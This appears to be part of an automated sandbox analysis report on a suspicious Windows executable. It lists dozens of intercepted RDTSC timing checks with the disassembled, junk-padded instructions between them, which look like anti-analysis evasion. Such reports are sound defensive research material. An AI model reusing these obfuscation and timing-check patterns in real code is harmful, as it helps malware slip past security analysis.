Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC5677 second address: AC5701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F98351AAB18h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 add dword ptr [ebp+1245D9A4h], eax 0x0000002a cld 0x0000002b push 00000004h 0x0000002d and dl, 00000053h 0x00000030 jmp 00007F98351AAB1Ah 0x00000035 call 00007F98351AAB19h 0x0000003a pushad 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e push eax 0x0000003f pop eax 0x00000040 popad 0x00000041 jmp 00007F98351AAB1Ah 0x00000046 popad 0x00000047 push eax 0x00000048 jmp 00007F98351AAB27h 0x0000004d mov eax, dword ptr [esp+04h] 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F98351AAB22h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC5701 second address: AC5724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC5724 second address: AC5728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC5950 second address: AC5993 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F9834D7504Ah 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b jl 00007F9834D75048h 0x00000021 push edi 0x00000022 pop edi 0x00000023 pushad 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 jng 00007F9834D75046h 0x0000002c popad 0x0000002d popad 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F9834D7504Ah 0x00000039 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC72CF second address: AC72EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F98351AAB24h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC72EC second address: AC72F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC72F0 second address: AC7310 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F98351AAB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F98351AAB22h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC7310 second address: AC7316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC7316 second address: AC731A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0010 second address: 6DD0016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0016 second address: 6DD001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD001C second address: 6DD0020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0020 second address: 6DD00E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F98351AAB20h 0x00000011 push eax 0x00000012 jmp 00007F98351AAB1Bh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov edi, esi 0x0000001b pushfd 0x0000001c jmp 00007F98351AAB20h 0x00000021 and al, 00000038h 0x00000024 jmp 00007F98351AAB1Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d jmp 00007F98351AAB26h 0x00000032 mov eax, dword ptr fs:[00000030h] 0x00000038 jmp 00007F98351AAB20h 0x0000003d sub esp, 18h 0x00000040 pushad 0x00000041 mov bx, ax 0x00000044 mov ecx, 3DC51B99h 0x00000049 popad 0x0000004a xchg eax, ebx 0x0000004b pushad 0x0000004c call 00007F98351AAB22h 0x00000051 mov di, cx 0x00000054 pop esi 0x00000055 popad 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F98351AAB1Fh 0x0000005e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD00E6 second address: 6DD00F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 17869D7Ah 0x00000008 mov eax, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD00F9 second address: 6DD0100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0100 second address: 6DD0106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0106 second address: 6DD010A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD010A second address: 6DD0120 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov ecx, 66EAFAE7h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0120 second address: 6DD0125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0125 second address: 6DD0140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9834D75051h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0236 second address: 6DD029A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F98351AAB23h 0x00000014 jmp 00007F98351AAB23h 0x00000019 popfd 0x0000001a call 00007F98351AAB28h 0x0000001f pop ecx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD029A second address: 6DD02B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 mov eax, 5D646CF9h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F9834D76051h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop eax 0x00000019 mov edi, 2B8110F0h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD02B9 second address: 6DD02D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98351AAB25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD02D2 second address: 6DD02F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9834D75059h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD02F6 second address: 6DD02FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD02FC second address: 6DD0300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0300 second address: 6DD03BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], edi 0x0000000e pushad 0x0000000f push eax 0x00000010 pushfd 0x00000011 jmp 00007F98351AAB1Bh 0x00000016 add cl, 0000000Eh 0x00000019 jmp 00007F98351AAB29h 0x0000001e popfd 0x0000001f pop eax 0x00000020 mov cx, dx 0x00000023 popad 0x00000024 call dword ptr [77210B60h] 0x0000002a mov eax, 766BE5E0h 0x0000002f ret 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F98351AAB29h 0x00000037 or cx, 73F6h 0x0000003c jmp 00007F98351AAB21h 0x00000041 popfd 0x00000042 mov eax, 174F58E7h 0x00000047 popad 0x00000048 push 00000044h 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d call 00007F98351AAB1Fh 0x00000052 pop esi 0x00000053 call 00007F98351AAB29h 0x00000058 pop esi 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD03BA second address: 6DD041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e pushfd 0x0000000f jmp 00007F9834D7504Ah 0x00000014 adc al, FFFFFFD8h 0x00000017 jmp 00007F9834D7504Bh 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, edi 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F9834D75054h 0x00000026 jmp 00007F9834D75055h 0x0000002b popfd 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD041D second address: 6DD0421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0421 second address: 6DD043C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movzx esi, bx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD043C second address: 6DD0466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, A661h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, edi 0x0000000b jmp 00007F98351AAB23h 0x00000010 push dword ptr [eax] 0x00000012 pushad 0x00000013 push esi 0x00000014 push edx 0x00000015 pop eax 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 mov bx, si 0x0000001c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0466 second address: 6DD04BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr fs:[00000030h] 0x0000000d jmp 00007F9834D75052h 0x00000012 push dword ptr [eax+18h] 0x00000015 pushad 0x00000016 mov ecx, 3E9C595Dh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007F9834D75058h 0x00000023 xor si, 6CE8h 0x00000028 jmp 00007F9834D7504Bh 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0520 second address: 6DD0524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0524 second address: 6DD0528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0528 second address: 6DD052E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD052E second address: 6DD0534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D6003B second address: 6D6003F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D6003F second address: 6D60043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60043 second address: 6D60049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D606CE second address: 6D60701 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F9834D7504Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60701 second address: 6D60705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60705 second address: 6D60721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75058h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60AD9 second address: 6D60B08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F98351AAB1Bh 0x00000009 jmp 00007F98351AAB23h 0x0000000e popfd 0x0000000f mov dx, ax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60B08 second address: 6D60B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60B0D second address: 6D60B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98351AAB25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60B26 second address: 6D60B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60B2A second address: 6D60B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F98351AAB26h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60B4D second address: 6D60B51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D60B51 second address: 6D60B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DB094F second address: 6DB095E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D90014 second address: 6D90048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, 31h 0x0000000d mov bx, 84B4h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F98351AAB29h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D90048 second address: 6D9008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9834D75057h 0x00000009 and ah, FFFFFFAEh 0x0000000c jmp 00007F9834D75059h 0x00000011 popfd 0x00000012 mov ebx, eax 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov al, bl 0x0000001d movzx ecx, di 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D9008F second address: 6D90095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D90095 second address: 6D90099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D90099 second address: 6D900F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F98351AAB20h 0x00000012 and esp, FFFFFFF0h 0x00000015 jmp 00007F98351AAB20h 0x0000001a sub esp, 44h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F98351AAB27h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D900F4 second address: 6D9013E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9834D7504Fh 0x00000009 xor eax, 39E00BDEh 0x0000000f jmp 00007F9834D75059h 0x00000014 popfd 0x00000015 mov dx, si 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d mov bh, ah 0x0000001f mov esi, ebx 0x00000021 popad 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movsx edx, ax 0x00000029 mov edx, eax 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D9013E second address: 6D9015E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F98351AAB1Eh 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D9015E second address: 6D901E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9834D7504Eh 0x00000011 and si, B7C8h 0x00000016 jmp 00007F9834D7504Bh 0x0000001b popfd 0x0000001c mov bx, si 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F9834D7504Bh 0x00000028 sbb ch, 0000000Eh 0x0000002b jmp 00007F9834D75059h 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 pushfd 0x00000034 jmp 00007F9834D7504Eh 0x00000039 sub ah, FFFFFF88h 0x0000003c jmp 00007F9834D7504Bh 0x00000041 popfd 0x00000042 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D9030D second address: 6D90313 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D90313 second address: 6D90317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D90317 second address: 6D9033B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6D9033B second address: 6D90356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75057h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC0471 second address: 6DC0486 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov dh, 74h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC0486 second address: 6DC049B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov al, bl 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC049B second address: 6DC049F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC049F second address: 6DC04F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9834D7504Ch 0x00000011 or ax, B6C8h 0x00000016 jmp 00007F9834D7504Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F9834D75058h 0x00000022 jmp 00007F9834D75055h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC04F8 second address: 6DC056B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F98351AAB27h 0x00000009 add cl, 0000001Eh 0x0000000c jmp 00007F98351AAB29h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 jmp 00007F98351AAB1Ch 0x0000001e push dword ptr [ebp+04h] 0x00000021 pushad 0x00000022 push ecx 0x00000023 mov ah, dl 0x00000025 pop eax 0x00000026 mov ebx, 60B29E3Ah 0x0000002b popad 0x0000002c push dword ptr [ebp+0Ch] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F98351AAB23h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DC056B second address: 6DC0588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E30AD8 second address: 6E30AED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E30AED second address: 6E30AF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6E30AF3 second address: 6E30AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
